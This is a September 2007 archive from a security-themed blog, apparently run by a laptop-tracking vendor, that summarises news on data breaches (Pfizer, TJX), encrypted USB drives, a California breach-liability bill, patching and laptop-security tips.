Archive for September, 2007

At The Security Standard conference held in Chicago on September 10th and 11th, experts met to discuss business security threats. Insider threats gained momentum this year in terms of the attention it was given by security professionals.

That is not to say that ongoing threats are no longer an issue.  Malware and hackers are still of concern to businesses worried about infected networks or data breaches. Survey results from the conference show that outsiders still account for more security issues, but the insider threat of data leakage is a growing concern.

Though different companies face different threats, threats related to financial crimes and identity theft are of high priority. It’s not simply about facing the threats, it’s now also about making sure organizations are compliant.

Nick Selby, senior analyst and director of The 451 Group’s enterprise security practice, indicates that 98% of data leaked is the result of “stupidity or accident,” not malicious intent. Policies and technology solutions can better deal with the “stupid” or “accidental” data leaks but they are unable to address intentional threats.

Attendees at the conference expressed concerns over mistakes made by employees and the challenges of tracking information sent outside the network. Experts advised companies to consider physical threats to data security (information tossed out or recycled without shredding) that have been at times overlooked by IT security departments.  On that note, it is important that organizations have an effective lifecycle management program and use tools like Absolute’s Computrace Data Protection to effectively remove all sensitive information from machines at the end of their lifecycle.

Via PC World ; Tags: internal threats, it security, data security, data leak, data leakage, security, identity theft

Portable data devices – from laptops to flash drives – pose one of the greatest threats to data security. These devices are stolen or are known to go missing on an all too frequent basis.

Security Policies often focus on the issue of laptop security, but with software to assist with this concern (including Absolute’s products) it is often flash drives that get missed.

The first step that every security policy should address is a clear definition of what data can be accessed & removed from a company network and what cannot.  Given the prevalence of security breaches caused by portable data devices, perhaps the appropriate use of laptops and flash drives is a logical second step. Regardless of where these policies start, it is important to remember that policy alone is not a strong enough safeguard against data loss.   

A new physical safeguard has come on the market in the form of the IronKey hardware-encrypted USB flash drive. The IronKey is designed to be the most secure flash drive on the market. It uses military-grade hardware-based encryption and the encryption keys are stored on the drive itself. In order to access and decrypt files, a password is required alongside the encryption keys.

The IronKey has a built in back-up against theft. If the password is incorrectly entered 10 times, the IronKey will internally self-destruct and completely erase everything on the drive.

In addition to this, the IronKey website can provide secure web browsing. When logged in – via the password and plugged-in USB device – the service turns FireFox into a malware-protected application.

IronKey’s hardware-encrypted flash drives and online protection services are ideal for companies who want to secure their endpoints and protect their data from leaking into the hands of unauthorized people. Equip your employees, sales people and your best customers and partners with IronKey devices, and enjoy the peace of mind that always-on hardware encryption can bring. – IronKey Enterprise

IronKey is $79 for 1GB and $149 for 4GB.

Via gizmodo ; Tags: ironkey, usb, flash drive, usb flash drive, flash, encrypted flash drive, data security, it security, business security

California may soon pass a law that will hold merchants liable for data breaches. The law (A.B. 779) would hold merchants responsible for the “reasonable and actual costs” associated with a breach, including notification and credit card replacement costs.

The law was proposed in response to the large data breaches of companies such as TJX. The legislation has been passed by the California Senate Judiciary Committee, but has not yet passed into law. Minnesota is the only state to have a merchant breach liability law.

It is interesting to examine the premise of the law. The law would require that the third party bear the brunt of the costs associated with the data breach. Although they may be directly responsible for the breach, they may not be solely responsible. Security policies for both companies may be at fault, and it is possible that businesses will not be held responsible for their own faults if they can offload them to merchants.

An effective security policy encompasses not just the company in question, but all merchants who deal with them. It is necessary to require merchants to agree to the terms of the security policy – whether this is encryption, laptop recovery software, password protection or security training – in order to conduct business.  The passage of this law could have wide ranging implications for businesses, merchants and all third parties.

Via CSO Online Tags: california, california law, legislation, security legislation, data breach legislation, data breach, third party merchants, business security, data security, security policy

The Office of the Information and Privacy Commissioner (IPC) of Ontario has released a letter written to the National Post in response to their article entitled “Privacy turns deadly.”

The National Post covered the recent report issued about the Virginia Tech Massacre. Their article points out the so-called fallacy of privacy regulations that “enabled” the massacre – the article states that the privacy laws prevented information about the mental health of Cho from coming to light, and that the same laws many times hindered his mental state from being examined more closely by the school and his own family.

IPC Ann Cavoukian issued a letter in response titled “Privacy is never deadly; inaction is at fault“, which neatly ties up the statements in her letter. She states that privacy is a base freedom, and the problems seen at Virginia Tech lie not with the privacy laws, but with individuals who fail to disclose information when it is required.

The laws allow for vital information to be disclosed in cases involving the health and safety of individuals. Perhaps it is a misunderstanding of the laws, in which case she points to a fact sheet on Ontario’s disclosure policies.

Clearly, educators and health care professionals have fears and misunderstandings about when to disclose private information, and this delay can be dangerous in situations when the information is required quickly.

Tags: virginia tech massacre, privacy, private information, privacy laws

Pfizer reported a data breach in June affecting 17,000 current and former employees. The breach was the result of unauthorized file sharing software on a laptop.

Pfizer has now reported a second data breach, this time as a result of the theft of two laptops. This data breach occurred in May, but was only recently reported to Attorney General Richard Blumenthal’s office.

In May, two company laptops were stolen, containing personal information (including Social Security numbers) for 950 health care professionals. Axia Ltd., a management consulting firm working with Pfizer, is responsible for the data breach. On May 31, two laptops were stolen from a locked car. Pfizer was notified on June 14, and the Attorney General reportedly sent a letter the next week. The letter did not arrive until mid-August.

“I am deeply disturbed and troubled by these continuing security problems with information that should be closely safeguarded,” Blumenthal said Monday. “This kind of information should be treated as if it was cash, because it has the same value as cash to someone who might misuse it.”

This is not the first time Pfizer has delayed notification. Pfizer waited 6 weeks before notifying employees about the previous data breach, and 5 weeks have passed before public acknowledgement of this second data breach. Blumenthal has criticized Pfizer on both data breach accounts, and has requested information about their data security and data breach notification policies.

Pfizer has issued a statement indicating they are strengthening their data security practices:

“Pfizer and Axia take data security very seriously and we are both taking steps to enhance data security,” according to Goldman’s letter. “For example, Axia is adding stronger encryption features to all Axia laptops, as well as software that would be able to help Axia locate and retrieve any stolen or missing laptops. Pfizer is in the process of limiting the use of SSNs (Social Security numbers) whenever possible, and exploring a range of other data-security improvements.”

Pfizer and Axia will provide those affected with credit monitoring services, fraud resolution representatives, and $25,000 in identity theft insurance.

Read the letters between Pfizer and Attorney General Blumenthal here [PDF].

Via TheDay.com ; Tags: pfizer, pfizer data breach, axia, axia data breach, data breach, identity theft, laptop theft, laptop security, blumenthal

A suspect has now been arrested for the TJX data breach, the biggest data breach in corporate history.

Authorities arrested a Ukrainian man named Maksym Yastremskiy, who they think is the largest seller of the stolen credit card numbers. Greg Crabb, program manager in the global investigations division of the US Postal Inspection Service, hopes the arrest will be a breakthrough in the investigation. The suspect is being called:

“one of the world’s important and well-known computer pirates.”

Authorities believe that Yastremskiy sold credit card numbers via password-protected or overseas online forums. Cards were sold from $20-$100, and in batches up to 10,000. The suspect is associated with individuals charged with similar crimes. The TJX hackers have not yet been identified.

Yastremskiy was arrested several weeks ago in Turkey, although the information about his relation to the TJX data breach has just surfaced. As noted in a recent post, the expected cost of this data breach for TJX is over $100 million.

Via Boston.com ; Tags: data breach, tjx data breach, identity theft, data breach cost, arrest, hackers, stolen credit cards

CA Security has released a new report exposing the risk of identity theft for Gamers. Online games often have their own form of virtual money, which can equate to real cash. This puts online gamers at risk, as online gaming accounts/identities will become as profitable as a real bank account.

The report indicates that online gaming is becoming as risky as online banking, and that identity theft and malware exploits are going to be increasing in this area. The second most common malware of 2007 was designed to steal gaming passwords. Character identities and virtual money are sold in underground websites - websites that rival the same marketplace behaviors as standard identity theft rings.

Social networks, of which gaming sites are included alongside others such as Facebook and MySpace, are large security risks because of their design. They are subject to the same weaknesses as websites, but with greater ease. Malicious code can easily be inserted into web pages – which any user can create – and the interconnectedness of social networking sites will spread it very quickly.

The report recommends, in addition to standard security measures, to set up your personal firewall for safer online gaming, use an anti-phishing toolbar, and to avoid use of peer-to-peer networks.

You can download the full report, which covers Internet Threats of various sorts, here [PDF].

Via Smarthouse Tags: id theft, identity theft, online gaming, online gamers, online games, online security, computer security, identity security

Keeping software up to date with the latest security patches is an important part of IT. Studies have previously shown this to be an area of concern, in that not all security updates are upgraded consistently across the network. In general, Windows security patches are more regularly and consistently updated, but they remain a headache for IT.

Graham Cluley of Sophos notes just how frustrating it is to install all the latest Windows security updates:

“It may sound straightforward, but installing the latest Microsoft patches is easier said than done, particularly if you have a regular stream of visitors connecting to your network.”

“Whether it is an employee’s desktop PC or a customer’s laptop, an unpatched machine represents a possible avenue for a cyber-attack.”

Patches must be rolled out to all machines, which poses a difficulty if not all machines are currently on the network, or if they are misconfigured.

The latest security patch was released on September 11 to address known vulnerabilities in Windows, MSN Messenger (both ‘critical’) and Unix services for Windows. You can find more information here.

Graham Cluley continues:

“All organisations should rollout these patches as a matter of urgency, as some of them could enable hackers to access data on a vulnerable PC or run malicious code,” said a statement from Sophos.

There is a continued risk if unpatched computers are brought onto the office network. It is difficult to police the security practices of guests, customers and business partners, so some form of Network Access Control should be implemented.

Via Secure Computing Magazine ; hat tip to flying hamster Tags: security, security patches, windows, windows security, it, it security, security policy

Scott Lowe of Tech Republic has published an article titled “10 things you should have already done to secure your laptop” and includes in his list:

1. Encrypt the hard drive
2. Install tracking software (such as Computrace)
3. Install antivirus and antispyware software
4. Tie down the machine with a lock (hardware or software)
5. Install a software firewall
6. Stay current with updates
7. Use a strong password
8. Use wireless networks carefully
9. Disable Windows services you don’t need
10. Make sure your laptop is insured

Visit Tech Republic for the full list, along with more details and links for further reading for each item.

For further reading, review past posts on strong passwords, wireless security, laptop locks and stay tuned to posts in our Laptop Security category.

Tags: laptop security, secure laptop, laptop protection, theft prevention, laptop theft, laptop loss, absolute software

The National Computing Centre (NCC) in the UK has posted the results of a recent survey on external IT security threats. The data indicates areas that pose serious security threats, including lack of business support for IT Security.

The survey of 190 organizations found that most companies are addressing certain external IT security threats (viruses, spam, hackers), but not others. In particular, security of WiFi networks, VOIP, and USB devices needs to be addressed further.

Findings from the study:

• 40% have partially secured, or completely insecured, wireless networks
• 15% have VOIP security
• 20% have laptop security implemented, another 20% have this in planning
• 75% recognize the liability of USB/data devices, but only 11% have controls implemented
• 25% say that formal security training is not relevant or considered
• 40% indicate security training is fully or partially implemented
• In companies with fewer than 25 IT employees, over half the companies have no IT Security specialist
• The median security spend was 3.3% of the IT budget

The NCC sees wireless security, in particular, as a large threat that should be addressed quickly.

Stefan Foster, MD of NCC Ltd said, “Running unsecured WiFi is like locking the front door, but leaving the windows open. Fraudsters are increasingly targeting IT systems and the growing use of WiFi is attracting their attention both inside and outside of the office environment. Unsecure wireless is putting organisations and those who interact with them at unnecessary risk.”

I was particularly intrigued that respondents did not consider internal training as necessary, when 25% of UK IT crime is internal. Overall, the data seems to indicate that security is of low priority in terms of planning and of budget.

Via Computerworld UK Tags: it security, security, business security, security specialist, data security, wireless security